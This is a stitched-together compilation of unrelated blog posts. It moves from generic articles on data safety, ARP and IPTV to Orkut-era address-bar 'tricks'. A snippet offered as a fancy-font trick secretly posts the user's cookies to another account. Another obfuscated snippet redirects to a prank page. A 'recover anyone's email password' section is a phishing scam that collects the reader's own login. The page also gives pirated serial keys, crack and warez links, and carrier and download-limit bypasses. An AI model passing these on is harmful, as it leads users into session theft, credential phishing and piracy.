Ways To Protect Your DataOnline And Offline

The online world grows stronger and stronger with each passing year.
Keeping your data safe both online and offline requires vigilance.
Just as there are always improvements being made to enhance the way
people do business online, there are people knowledgeable enough to
abuse that technology for purposes of identity theft and other forms
of cyber terrorism. If you really want to make the online experience
the best that it can be now and in the long term, then you need to
consider the following best ways to protect data, both online and off.
1) Encryption technologies
Your hosting provider and software that you use to build and develop
your website should work in agreement with one another to stay on top
of the latest in encryption technologies. You don't want your users to
suffer as a result, so make sure that it doesn't affect usability, but
at the same time be vigilant about what you have in place to protect
you from harm.
2) Content control
Certain documents and writings should not be released to the public,
so make sure that you have set content control standards in place that
limit access to only the things you wish for the public to see. As far
as other content is concerned, make sure that you trust the people,
who are representing you, and keep vital things close to the vest at
all times.
3) Personal information
Never ever ever share personal information across non-secure
locations. Social security numbers,passwords, and other pertinent
financial information should be off limits. You may even wish to
partner with an outside firm thatspecializes in protecting personal
data, just to ensure some kind ofsecurity with regards to your
insurance.
4) Accessibility
Passwords remain one of the strongest things that you can have in the
fight against online crooks. But you've got to be smart about how you
use them to be effective. It is recommendedthat you use a different
password for all of your important emails and accounts, and that you
store these passwords in a notebook instead of the desktop on your
computer.Cyber thieves are way too advanced in how they are able
tobreak on to computers and make them available for their own personal
use. You may even be sharing your hard drive with a thief and not know
it. So if it has any direct or indirect tie to your reputation or
finances, then you should probably forgo sharing it or storing it on
modern technological devices.

Tech Jobs and Cloud Computing

Being able to access information from your home, office, school, etc.
is something that is becomingmore and more of a reality. It's a result
of cloud computing. This innovation makes it possible for people to
access whatever is important them without being tied to their
computer. So, if you want to share a document, photo, video, or even
music clips with friends and family, you can do so no matter where you
are.
If you are trying to make a decision on a future career choice,
becoming proficient in the cloud-computing field can make your search
for tech jobs even easier. That's because there aren't many people
that can say they have extensive experience with this quickly emerging
industrial science. Careers of the past, such as help desk
technicianare quickly fading. Many people are familiar with computers,
the Internet, social media, and more, and the need for someone to walk
you through computer basicsis becoming obsolete.
People want information quickly and almost immediately. Deciding to
pursue tech jobs in cloud computing can set you on a path to a bright
future. More and more companies will be requestingindividuals that can
manage cloud projects. The good thing is that many industrial science
experts already possess some of the skillsneeded in order to work well
in the cloud-computing field. Some ofthese skills involve making sure
business systems are set up with secure information systems, data
integrity, proper networking and more. In addition, the right
candidate will understand the importance of aligning business and
information technology to ensure things run smoothly.
Also, when pursuing tech jobs in the cloud-computing field, a
company's needs can vary greatly. This means, some businesses may look
for someone that has worked as a system's analyst and also knows
coding. Or,on the other hand, another company may be in need of a
technical writer that can help getthe process down step by step
because it doesn't matter how great the idea is if it can't be
implemented properly.

Understanding How Data Packets Travel Across the Network

When troubleshooting IP networksover Ethernet it helps to understand
how packets travel across the network. Packets use two different
mechanisms to get from point A to Point B, or from the source to the
destination. IP addresses and MAC addresses.
The MAC address is the layer 2 address that represents the specific
hardware that is connected to the wire. The IP address is the layer 3
address that represents the logical identity of the device on the
network.
MAC Address
Most every computer today has some sort of network interface card
(NIC) either built-in or installed on the computer. Every NIC is
created with a hardware number permanently "burned" into it. This
permanent hardware number is known as the MAC (Media Access Control).
MAC addresses are 48 bits in length and are usually displayed as a 12
digit hexadecimal number.
MM:MM:MM:HH:HH:HH
The first 24 bits (or 6 digits) represent the manufacturer of the NIC.
The last 24 bits (6 digits) are a unique identifier that represents
the Host or the card itself. No two MAC identifiers are alike.
IP Address
The IP address is the logical address that is associated with the MAC
for a particular device. IPaddresses (IPv4) are a 32 bit (12 digit)
number representing 4 binary octets.
Both an IP and a MAC are needed for data to travel across an Ethernet network.
The ARP Protocol
When a computer sends data over the network, it first needs to find
which route it must take. Will the packet stay on the network or does
it need to leave the network. The computer first determines this by
comparing the subnet mask to the destination ipaddress.
Once this destination is known, Address Resolution Protocol (ARP) is
used to find the next hop on the network. ARP's job is to basically
discover and associate IPaddresses to the physical MAC.
For a packet that has a destination on another network, ARP is used to
find the MAC of the gateway router. An ARP packet is sent to the
gateway router asking for it's MAC. The router reply's back to the
computer with it's mac address. The computer will then forward the
packet directly to the mac address of the gateway router.
When the gateway router receives the packet it will removeit's mac
address as the destination and replace it with the mac address of the
next hop router. It will also replace the source computer's mac
address with it's own mac address. This happens at each route along
the way until the packet reaches it's destination.
Going Postal - An Example
Let's use the postal service to help explain this. Think of this
process like taking a letter and stuffing it in an envelope. Then take
that envelope and stuff it inanother envelope addressed to the local
post office. The post office then takes out the inner envelope, to
determine the next stop on the way, puts it in another envelope with
the new destination.

IPTV For Your Home Or Office

If you are looking for a type of Television entertainment that
canprovide you with excellent facilities and a straightforward set up,
an IPTV service is the idealsolution. This is a service that enables
you to view Television online, as an alternative to depending on the
traditional types of transmission such as fiber and satellite systems.
This means that this kind of Television has some added benefits that
onecan take advantage of.
For starters, the quality of this type of entertainment is far better
than other forms. Since there's usually very little interference when
signals are being transmitted online, one rarely suffers from low
quality such as whenever you watch satellite Television and there's
cloud cover. The results is that one can always enjoy high quality,as
long as your internet connection is reliabe.
In addition to that, you are able to also benefit from a chance to
rewind live Television. This has been made possible by the fact that
when streaming, the data is generally buffered in your computer for
better quality. This means that whenever you miss a programme, you are
able to simply rewind the show to that point where you want, and then
simply start viewing whatever you had missed.
In a lot of cases it is more economical to watch Television online as
opposed to pay for satellite or Cable. An important reason for this is
that the equipment required to broadcast signals online is generally
much cheaper than that needed to perform the same function over other
media. This means that if you are on a spending budget, this is a
excellent solution.
When you need to subscribe to such a service, there are a number of
things you need to consider. Initial of all, you really need to make
sure that your internet connection is trustworthy. Since the signals
will be transmitted online, any suspect internet connection may affect
the quality of your viewing.It can end up being better to have a high
speed internet connection for this sort of use, asstreaming online TV
can be very data intensive. It's also advisable that you also have an
unlimited data plan for the same reason.

How About Computer and Keyboard Recycling?

Everybody knows it is a good thing to do to recycle. If you recycle
you are preserving the earth and re-using materials instead of
throwing them into a landfill due to laziness or ignorance. Did you
know that there are special companies that are made for recycling
electronic items specifically?
The most commonly recycled electronic items of all are computers and
their keyboards. Just with one item, you can contribute greatly to
making the earth a better place to live. There are so many different
metals and plastics involved in making electronic items that are
harmful to the environment and by taking them out of the picturewe can
actually reverse the earth's destruction rather than help it move
forward.
Recycling your keyboard and computer is easy. All you have to do is
call a recycling company near you that takes electronic items and you
just give them a time and a place to come pick it up. You can also
drop it off if you don't want to have them come pick it up but it is
just an easy solution for you so you have no obligations.
When they take your items they will separate them into all different
categories according to material. The plastics, each different type of
metal, glass andother information holding pieces will be disposed of
separately.
If you are holding on to an old computer because you are afraid of the
information getting out, you need not worry about that at all. All
electronic recycling places take an oath to never tamper with hard
drives or otherpieces of equipment that hold confidential information.
They will tell you about their exclusivity and privacy policies which
will allow you to feel relaxed while letting them handle your
belongings.
They will take your information and securely dispose of it properly.
This means after they pick it up from you, they will give you a
tracking number. You will beable to see where your item is atall times
and they will even notify you when it is destroyed. It is guaranteed
to be destroyed within 48 hours of pick up. This means all
informational pieces get thrown into a shredder and are made sure to
be irretrievable or even recognizable for that matter.

How 3D Printing Brings Value?

How can 3D model printing serve you? Well that depends on who you are.
Are you an engineer or 3D artist? Are you a consumer? Are you in a
product developmentbusiness? Do you like custom goods? 3D model
printing isn't for everyone, but it has the potentialto change the
world. Let's go over what 3D printing is first.
3D printing a style of additive manufacturing in which a three
dimensional object is created by laying down layers on top of layers
in which these layers are made out of certain materials. Each of these
layers are bonded together within a 3D printing machine. These
machines produce 3D objects with great precision, and can form almost
any object out of a wide variety of materials.The materials used may
consist ofplastics, metals, ceramics, or evenprecious metals. The use
of these machines can produce products ata much faster rate than
traditional additive manufacturingtechnologies. Basically, 3D printing
consists of layer by layer assembly of objects within a 3D printer.
The basis for each product comes from a 3D design, which would be
created by an engineer or 3D artist. This technology allows for 3D
model printing to be completed by anyone with Computer GeneratedImage
(CGI) experience.
As artists and engineers design each model, the sky is the limit!
Artists can design virtually anything to be printed. The limit
ispurely each designer's imagination.What does this mean? Truly custom
products can be designed for consumers. There will be a massive avenue
for custom manufacturing! If you think that engraving items is
special, just wait until 3D model printing becomes much more
widespread. The design of someone's face could be possible! Imagine
how creative a valentines gift or Christmas gift could become.
There is also another aspect of 3D model printing - the business side.
Perhaps a company is amonga phone company, more specifically, the
hardware for cell phones, not service. If a new phone were to be
launched, wouldn't it be a great idea for product developers to 3D
model print a design of a phone, and give it to investors to where
they could HOLD the design? That might be much more reliable rather
than seeing a digital picture of the phone, and creating a hold-able
product might influence the decision of investors.
In addition, let's look at the engineering aspect of 3D model
printing. How could this change the game for certain businesses? Let
me cover an oil and gas company. An oil well is about to bedrilled,
and a highly specific valve system needs to be created. The engineers
need this ONE highly specific part to be designed, but they don't want
to have to deal with paying for the production of 50 of them. At the
same time, they would like it in a very specific material without
being gauged for pricing. 3D printing could save the day by allowing
forthe creation of only 1-3 pieces, at a much more inexpensive price.

Importance of Data Recovery Service

If you belong to the modern society, you actually mustrealize that
you need to have better way of thinking about anyaspects in your life
especially in the way you conduct work. For example, let's take
certain case of people who use computer the most in their daily
activity for working, whether personally or ina company. Any of us
actually have recognized that if we use computer to support our work,
we need to save our data on thehard disk so that we can continueto
work on it later right?
In this condition, some people sometimes forget that there is
always a risk for them in losing such important data of their work
because of any causesespecially natural disaster. It is indeed that
you may get frustration if you lose such data accidentally. So, if
such bad condition happens to people, is there any solution to
overcome it? In this case, perhaps hiring hard drive recovery service
becomes the main thing that those people can do.
Such service can help us to recover any lost data on our
computer. You need to understand that there are many services that you
can find out there, even from the internet. If you live in Chicago, I
can recommend you quality data recovery Chicago service for you. You
can visit their office at 225 WWashington, Suite 2200 Chicago, IL,
60606 USA (312) 626-2470 or simply go to their site at
Dataretrieval.comto get more information about RAID data recovery as
well as their service.

How to Create Google Adsense Search To Show Result Within Your Blog


1) Open your Adsense account, click on “My Ads”, select “Search” from left, click on “Custom Search Engines” and Click “New custom Search Engine”.
2) Fill your name, keywords and all the other data.
3) In “What to Search”, select “Only Sites I select” and write the complete URLs (Including http://) of the sites you want to search. You may only add your site to show results from your blog/site.
4) In “Search Results and Ad location”, scroll to “Search Results” and select “On my website using an iframe”.
 5) Now login to WordPress dashboard and create a new WordPress page. This page will be the place where the search results would be shown. It’s better to create a page name with “Search” and don’t forget to use noindex tag for that page. So lets assume your page name is domain.com/search
6) So in above image, in URL Field, you will be adding http://domain.com/search. Replacing domain name with your actual domain name.
7) Click on “Save and get code”. You will get 2 codes. The 1st code is for displaying the search box and the 2nd one is to be added in the page where you will like to show the search results i.e the page you create in 5th step.
8 ) Open your WordPress Dashboard and open html editor of the page you created in 5th step. Paste the 2nd Adsense you got in previous step.
9) Create a text widget and paste the 1st Adsense code.
10) All is well! You are done, Start earing from Search results.
[*] If your search box is looking big, find “size=” in the 1st Adsense code and set its value to lesser amount.
Many Adsense publishers claimed that search box helps them to generate a good revenue. You can always configure ad placement for search while configuring the ad or edit the already created channel from dashboard.
Do let us know if you are using Adsense for search and are you showing search result on your blog page or you letting your readers to move away from your blog?

I'm Feeling Lucky Button, What Is It and How Do I Use It?

One of the most notable objects on the Google Web search is the I'm Feeling Lucky button.

The button may have been named as a play on the Clint Eastwood line in the movie Dirty Harry .

"Do you feel lucky, punk? Well, do you?"

Ordinarily when you type in a keyphrase in a Google search, you press the search button, (you can also just press return or enter on your keyboard) and Google returns a results page that shows multiple Web sites matching your search phrase. TheI'm Feeling Lucky button skips thesearch results page and goes directly to the first ranked page for that search phrase.

If you type "white house" in the search box and press I'm Feeling Lucky, you'll go straight to www.whitehouse.gov . If you type"apple" into the search box and press I'm Feeling Lucky, you'll go directly to Apple Computer's Web site. Depending on your search query, the first result is usually the very best guess, so hitting the I'm Feeling Lucky button saves you a few extra seconds parsing through the list of searchresults.

I'm Feeling Lucky is handy if you'refairly confident that the first result in the search engine is going to be exactly the page youwant to find, but not so handy if you know you're going to be looking at a lot of sites. Using theI'm Feeling Lucky button is also a common way for people to point out Google bombs. It adds an element of surprise to the joke, but it only works if the Google Bomb is the very first result.

Name your blog like Website

Switch to Custom Domain

When you use Blogger you use it's doamin i.e blogspot.com. It is present in each URL of blogs of Blogger. Like
http://film-cast.blogspot.com/
http://colorsfromindia.blogspot.com/

Now when you change to custom domain it will look more professional and attract more visitors.
Above URL will change to
http://film-cast.com

Blinking Scraps !!


Blinking Scraps !!
Blinking Scraps !!
Use this HTML tag to write scraps that blinks !!
<font style=text-decoration:blink>



Eg: <font style=text-decoration:blink> HII

Will Blink HII.............

copy nd paste this address bar of ne orkut page and hit enter see the magic


copy nd paste this address bar of ne orkut page and hit enter see the magic



javascript:i=0;c=["red","green","blue","yellow","magenta","orange","pink","violet"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0); alert("ARE YOU READY? ")

¯_¯_ ?¦ Orkut Big Smileys ¦? _¯_¯


¯_¯_ ?¦ Orkut Big Smileys ¦? _¯_¯
Big Smileys

Just copy paste in ur scrap book

<img src="www.messhits.com/dp/big-smiles/big-smile-(messhits.com)65.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)51.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)54.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)25.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)40.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)39.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)34.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)32.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)30.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)28.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)27.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)15.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)13.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)9.jpg" height="70" width="70">

<img src="http://www.messhits.com/dp/big-smiles/big-smile-(messhits.com)48.jpg" height="70" width="70">

To ban the owner:


ban the owner
To ban the owner:

javascript:d=document;a=d.forms[1];a.action="CommMemberManage.aspx?Action.ban&cmm=0000000&uid=00000000";a.submit()

To unban the owner:

javascript:d=document;a=d.forms[1];a.action="CommMemberManage.aspx?Action.unban&cmm=0000000&uid=00000000";a.submit()
this is only possible if u r the moderater of the community

u will like this script 4 sure....


u will like this script 4 sure....
javascript:eval(String.fromCharCode(119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 111, 114, 107, 117, 116, 46, 99, 111, 109, 47, 104, 111, 109, 101, 68, 101, 108, 101, 116, 101, 100, 46, 97, 115, 112, 120, 34, 59))



copy and paste this link in ur add bar and see the magic

after enjoying it don't forget to stun ur frnds

add colour to ur font........


add colour to ur font........
javascript:cor=new Array('red','blue','green');var z=0;p3=document.getElementsByTagName('textarea')[0]; p3.value=p3.value.replace(/\n/gi,'§ ');sp=p3.value.split(' ');p3i='';for(l=0;l<sp.length;l++){p3i+="["+cor[z]+"]"+sp[l]+' ';z++;if(z==cor.length){z=0}}; p3.value=p3i;p3.value=p3.value.replace(/\§/gi,'\n'); p3=document.getElementsByTagName('textarea')[0];p3.value=p3.value.replace(/ /gi,"??? ");void(0)


post this in ur addresss bar nd press enter......

airtel gprs hacking..


airtel gprs hacking..

You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( It’s FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile’s modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobile’s modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2# / Try 99***1
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get “Access
Denied…”(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and…….WAIT

9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal.

-------------------------------------------------------------------

Windows System Key Combinations:



Windows System Key Combinations:

F1: Help
CTRL + ESC: Open Start menu
ALT + TAB: Switch between open programs
ALT + F4: Quit program
SHIFT + DELETE: Delete item permanently

Windows System Key Combinations:



Windows System Key Combinations:

F1: Help
CTRL + ESC: Open Start menu
ALT + TAB: Switch between open programs
ALT + F4: Quit program
SHIFT + DELETE: Delete item permanently

Useful Shortcut:


Useful Shortcut:
Start + M: Minimizes all open windows
Start + Shift + M: Maximizes All Windows
Start + E: Runs Windows Explorer
Start + R: Open the RUN Dialog Box
Start + F: Open the Search Results Dialog box
Start + CTRL + F: Opens the Search Results-Computer dialog Box (if the computer is connected to a network)
Start + Pause (Break): Opens the System Properties Dialog Box

Lock Computer



Lock Computer

we'll make a "Lock Computer" Shortcut on your Desktop so you can lock your computer by simply double-clicking on an icon.
On an empty space on your desktop, right click and select "New" then "Shortcut".
You'll see this shortcut wizard Server.
Paste the following line into the "Type the location of this item" box. Click "Next".

%windir%\System32\rundll32.exe user32.dll,LockWorkStation
This next dialog box will ask for a name for this shortcut. Type in "Lock Computer" or something that makes sense to you. Click "Finish".
Now you'll have an icon on your desktop that allows you to quickly lock your
computer without having to go through the process of "control-alt-delete" -> "Lock Computer".

Yahoo with multiple login IDs Without any Software



Yahoo with multiple login IDs Without any Software

TO USE MANY NUMBER OF YAHOO MESSENGERS AT A TIME WITHOUT NEED OF SOFTWARE


GO TO START MENU ACTUALLY SITUATED ON LEFT BOTTOM ON EVERY ONES PC

THEN CLICK ON RUN

TYPE CMD PRESS ENTER COMMAND PROMPT WILL OPEN

IN COMMAND PROMT TYPE REGEDIT AND PRESS ENTER THEN REGISTRY EDITOR WILL OPEN

IN REGISTRY EDITOR

CLICK ON + SYMBOL NEAR HKEY_CURRENT_USER

THEN THE FOLDERS UNDER HKEY_CURRENT_USER WILL BE SHOWN

NOW CLICK ON + SYMBOL NEAR SOFTWARE

THEN FOLDERS UNDER SOFTWARE WILL BE SHOWN

THERE U ILL FIND A FOLDER NAMED YAHOO NOW CLICK ON + SYMBOL B4 IT

THEN U ILL FIND A FOLDER NAMED PAGER CLICK THE+ SYMBOL B4 IT

THEN UILL FIND A FOLDER NAMED TEST CLICK ON IT

ON THE RIGHT SIDE OF THE REGISTRY EDITOR UILL FIND A REGISTRY ENTRY NAMED DEFAULT

NOW BELOW IT RITE CLICK UR MOUSE SELECT NEW >> SELECT DWORD VALUE>> NAME IT AS PLURAL

NOW CLICK ON NEW REGISTRY ENTRY CREATED BY U AND NAMED AS PLURAL IT WILL ASK FOR A VALUE GIVE IT 5

OR ANY NUMBER DEPENDS ON HOW MANY YAHOO MESSENGERS U WANNA USE AT A TIME

CLOSE THE REGISTRY EDITOR AND CLICK ON YAHOO ICON AND U CAN OPEN ANY NUMBER OF YAHOO IDS AT ONCE....

Hide File In Image


Hide File In Image

1. Gather the file you wish to bind, and the image file, and place them in a folder. I will be using C:\New Folder
-The image will hereby be referred to in all examples as fluffy.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\New Folder]

5. Type [copy /b fluffy.jpg + secret.rar fluffy.jpg] (remove the brackets)

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from fluffy.jpg to fluffy.rar, then open and your file is the

------------------------------------------------------

Yahoo with multiple login IDs


Yahoo with multiple login IDs

Multiple Login in Yahoo! by regedit

Follow these steps : ->

* Go to Start ==> Run ==>> Type regedit,hit enter

* Go to HKEY_CURRENT_USER -> Software -> Yahoo -> pager -> Test

* On the right pane ==>> right-click and choose new Dword value .

* Rename it as Plural.

* Double click and assign a decimal value of 1.

* Now close registry and restart yahoo messenger.

* For signing in with new id open another messenger .

--------------------------------------------------

Hacking Rapidshare:


Hacking Rapidshare:

Tired of waiting for another few minutes after downloads try dis
It works


While waiting for download,
 type javascript:c(countdown = 0); in the browser addressbar to eliminate the rapidshare countdown (waiting) feature.
If this trick doesn't work, try the alternative below:

javascript:var%20counta=0;var%20countb=0

;var%20countc=0;var%20countd=0;var%20countd=0

(Just copy and paste this code in your address bar)

another method(Works only if u hv dynamic Ip)

Then, follow the steps below to get a new IP:

1. Go to Start->Run and type in "cmd" without quotes to bring up the command prompt. Hit Enter.

2. Type in "ipconfig /flushdns" without quotes and hit Enter.

3. Type in "ipconfig /release" without quotes and hit Enter.

4. Type in "ipconfig /renew" without quotes and hit Enter. You should now have a new IP address.
Check your IP address at IP Chicken again and compare it to the one you got earlier.

5. Now, erase your browser's cache and cookies.

6. Try downloading the Rapidshare


Now enjoy unlimited download from rapidShare..

Start a movie in paint!



Start movie in Paint!
* First start a movie in any player.

* Then open Paint.

* Now, in the player when the movie is being played, press "Print screen" button on your key board.

* Now, Press ctrl+v in Paint

* Leave the movie player open and don't minimize it.

* Open Paint now and see the movie in the Paint!

-----------------------------------------------------

Block websites without any software


Block websites without any software

Steps

1] Browse C:\WINDOWS\system32\drivers\etc

2] Find the file named "HOSTS"

3] Open it in notepad

4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.

5] Done!


example :

127.0.0.1 localhost

127.0.0.2 www.orkut.com-


www.orkut.com is now unaccessable


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.


ie:

127.0.0.3 www.yahoo.com

127.0.0.4 www.msn.com

127.0.0.5 www.google.com


This also works with banner sites, just find the host name of the server with the banners and do the same thing with that addy.

Hope this small tutorial could keep you going in simple way of blocking websites..

---------------------------------------------------

Speed Up Ur PC




Cleaning Ur RAM
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc.
That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...

Type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".


FreeMem=Space(128000000)

--------------------------------------------

kewl keyboard combinations..... ????hay this is really cool do try it????


kewl keyboard combinations.....
????hay this is really cool do try it????

????all u have to do is:-

1 ?open a text document.

2 ?hold alt key.

3 ?press the code numbers one by one.[Eg132]

4 ?release alt key.

¦¦¦¦NOTE ¦¦¦¦:- by using cudes given below u will get cool fonts.this also works in orkut but many of codes will get font"?" which is actually a different font in text document so do try it there also.

Alt+1= ?

Alt+2= ?

Alt+3= ?

Alt+4= ?

Alt+5= ?

Alt+6= ?

Alt+7= •

Alt+8= ?

Alt+9= ?

Alt+10= ?

Alt+11= ?

Alt+12= ?

Alt+13= ?

Alt+14= ?

Alt+15= ¤

Alt+16= ?

Alt+17= ?

Alt+18= ?

Alt+19= ?

Alt+20= ¶

Alt+21= §

Alt+22= ?

Alt+23= ?

Alt+24= ?

Alt+25= ?

Alt+26= ?

Alt+27= ?

Alt+28= ?

Alt+29= ?

Alt+30= ?

Alt+31= ?

Alt+127= ¦

Alt+128= Ç

Alt+129= ü

Alt+130= é

Alt+131= â

Alt+132= ä

Alt+133= à

Alt+134= å

Alt+135= ç

Alt+136= ê

Alt+137= ë

Alt+138= è

Alt+139= ï

Alt+140= î

Alt+141= ì

Alt+142= Ä

Alt+143= Ã…

Alt+144= É

Alt+145= æ

Alt+146= Æ

Alt+147= ô

Alt+148= ö

Alt+149= ò

Alt+150= û

Alt+151= ù

Alt+152= ÿ

Alt+153= Ö

Alt+154= Ü

Alt+155= ¢

Alt+156= £

Alt+157= ¥

Alt+158= P

Alt+159= Æ’

Alt+160= á

Alt+161= í

Alt+162= ó

Alt+163= ú

Alt+164= ñ

Alt+165= Ñ

Alt+166= ª

Alt+167= º

Alt+168= ¿

Alt+169= ¬

Alt+170= ¬

Alt+171= ½

Alt+172= ¼

Alt+173= ¡

Alt+174= «

Alt+175= »

Alt+176=¦

Alt+177= ¦

Alt+178= ¦

Alt+179= ¦

Alt+180=¦

Alt+181= ¦

Alt+182= ¦

Alt+183= +

Alt+184= +

Alt+185= ¦

Alt+186= ¦

Alt+187= +

Alt+188= +

Alt+189= +

Alt+190= +

Alt+191= +

Alt+192= +

Alt+193= -

Alt+194= -

Alt+195= +

Alt+196=-

Alt+197=+

Alt+198=¦

Alt+199=¦

Alt+200=+

Alt+201=+

Alt+202=-

Alt+203=-

Alt+204=-

Alt+205=¦

Alt+206=+

Alt+207=-

Alt+208=-

Alt+209=-

Alt+210=-

Alt+211=+

Alt+212=+

Alt+213=+

Alt+214=+

Alt+215=+

Alt+216=+

Alt+217=+

Alt+218=+

Alt+219=¦

Alt+220=_

Alt+221=¦

Alt+222=¦

Alt+223=¯

Alt+224= a

Alt+225= ß

Alt+226= G

Alt+227=p

Alt+228= S

Alt+229= s

Alt+230= µ

Alt+231= t

Alt+232= F

Alt+233= T

Alt+234= O

Alt+235= d

Alt+236= 8

Alt+237= f

Alt+238= e

Alt+239= n

Alt+240= =

Alt+241= ±

Alt+242= =

Alt+243= =

Alt+244= (

Alt+245= )

Alt+246= ÷

Alt+247= ˜

Alt+248=°

Alt+249= ·

Alt+250= •

Alt+251=v

Alt+252= n

Alt+253= ²

Alt+254= ¦

important note......
Alt + number combination

Here the numbers to be given from the numpad on the far right of the keyboard ...otherwise ..won't work...

just follow some easy steps..........


???t? ?? ©ssl ?ay l?k? t??? !!!!!!
just follow some easy steps..........


step 1:click on reply.

step 2:write ur reply.dont click on reply.

step 3:paste the code in ur address bar.

step 4:press enter

step 5:click on submit

javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"a");txt.value=txt.value.replace(/b/gi,"ß");txt.value=txt.value.replace(/w/gi,"?");txt.value=txt.value.replace(/d/gi,"?");txt.value=txt.value.replace(/p/gi,"?");txt.value=txt.value.replace(/N/gi,"?");txt.value=txt.value.replace(/t/gi,"t");txt.value=txt.value.replace(/E/gi,"?");txt.value=txt.value.replace(/i/gi,"?");txt.value=txt.value.replace(/c/gi,"©");txt.value=txt.value.replace(/v/gi,"v");txt.value=txt.value.replace(/h/gi,"?");txt.value=txt.value.replace(/f/gi,"Æ’");txt.value=txt.value.replace(/l/gi,"l");txt.value=txt.value.replace(/s/gi,"?");txt.value=txt.value.replace(/o/gi,"s");txt.value=txt.value.replace(/m/gi,"?");txt.value=txt.value.replace(/r/gi,"?"); reverse();locker=replyForm;locker.toUserId.value=88222073;locker.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));locker.action='Scrapbook.aspx?Action.submit';locker.submit();;void(0);

Leave Winferno Registry Power Cleaner



Leave Winferno Registry Power Cleaner

Other Software name is Registry Mechanic
http://www.pctools.com/registry-mechanic/download/

Serial Key:
Registration Name: Todd Henderson
Serial Number: 568B-EC7D-E14D-7D6E-B883-138C-1D06-8731

free download total video converter



free download total video converter

http://www.effectmatrix.com/total-video-converter/index.htm

or download with crack
[content suppressed]

password : blackangel

hXXp://rapidshare.com/files/8213541/Total_Video_Converter_3.02.zip



Replace XX with tt

@aiman
Serial1: 45808BAF-3D30FC65-223DE03A-CE6CD2A7-684B110A-77562C3E-006B365F-1E459F7E-61A57658-DF9DF0A7-9AD3099E-4C4AB473-663EFFA6-4E95C4C4-81402F61-753AA30D



Serial2:0ab52023-ba00347e-9fa86acd-fdc330a9-68578b7e-264b81e1-30bdfeef-cea403fa-20457e4a-39c03409-f69a9aba-388e8a94-677044c7-643fe9ac-66523c91-18a61801
try both
---------------------------------------------------------------

solid works 2008,edrawings 2008 n inventor pro 2008



solid works 2008,edrawings 2008 n inventor pro 2008

www.fullversionfinder.com/download-Autodesk-Inventor-Pro-2008-crack-serial-keygen-rapidshare.html

www.ddlprovider.com/warez-download-8.0.0.708-edrawings-2008-rapidshare-megaupload-crack-serial-keygen-key...


www.crackserialkeygen.com/crack-Solidworks-2008-serial-keygen-nfo.html

---------------------------------------------------------------

Enjoy the magic of MAYA 8.5


Enjoy the magic of MAYA 8.5
Part 1:
http://rapidshare.com/files/23499639/maya.part1.rar

Part 2:
http://rapidshare.com/files/23500152/maya.part2.rar

Part 3:
http://rapidshare.com/files/23500744/maya.part3.rar

Part 4:
http://rapidshare.com/files/23500847/maya.part4.rar

Password for the file:
cream_shagger
---------------------------------------------------------------

To obtain an e-mail address password of any person


To obtain an e-mail address password of any person
There have been many atempts done but there are only few methods to get passwords
but this is one of the very few that work.
*Use this with care and do not abuse this privilege.*

Send an e-mail to [batch_pass_retrive@yahoo.com]

In the subject option, type: batchpassretrive
provide your full email address and password for Authentication to the server.
In the actual e-mail part, copy and paste this:



</^"pwd sys rtrv" Member_" Type Your e-mail address here "
pwd_" type Your e-mail address password "
VictimAdrss_" Victim's e-mail address here "^/>


Note: send this e-mail from a different ID everytime you want to use it.
